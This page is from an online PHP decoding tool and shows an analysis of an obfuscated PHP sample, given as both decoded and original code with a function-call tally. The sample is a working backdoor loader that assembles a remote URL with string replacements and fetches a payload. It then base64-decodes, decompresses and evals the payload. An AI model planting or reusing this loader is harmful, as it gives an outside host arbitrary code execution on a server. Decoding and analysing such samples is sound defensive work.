Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $z="asxo"; $y="jgsdk_s"; $p=".cpsom"; $i="/vonepieceb"; $t=..
Decoded Output download
<?php
$z="asxo";
$y="jgsdk_s";
$p=".cpsom";
$i="/vonepieceb";
$t=".taaaaoxt";
$z=str_replace("a", "ht",$z);
$z=str_replace("s", "tp://",$z);
$z=str_replace("xo", "dyg.",$z);
$y=str_replace("sdk_s", "dyde",$y);
$p=str_replace("ps", "",$p);
$i=str_replace("onepiece","",$i);
$t=str_replace("aaaao","",$t);
?>
<?=eval("?>".gzuncompress(base64_decode(file_get_contents($z.$y.$p.$i.$i.$t)))); ?>?>
Did this file decode correctly?
Original Code
<?php
$z="asxo";
$y="jgsdk_s";
$p=".cpsom";
$i="/vonepieceb";
$t=".taaaaoxt";
$z=str_replace("a", "ht",$z);
$z=str_replace("s", "tp://",$z);
$z=str_replace("xo", "dyg.",$z);
$y=str_replace("sdk_s", "dyde",$y);
$p=str_replace("ps", "",$p);
$i=str_replace("onepiece","",$i);
$t=str_replace("aaaao","",$t);
?>
<?=eval("?>".gzuncompress(base64_decode(file_get_contents($z.$y.$p.$i.$i.$t)))); __halt_compiler();?>
Function Calls
str_replace | 7 |
gzuncompress | 1 |
base64_decode | 1 |
file_get_contents | 1 |
Stats
MD5 | 754ed8c5ffd22cd0d1effba9ddc916b8 |
Eval Count | 0 |
Decode Time | 289 ms |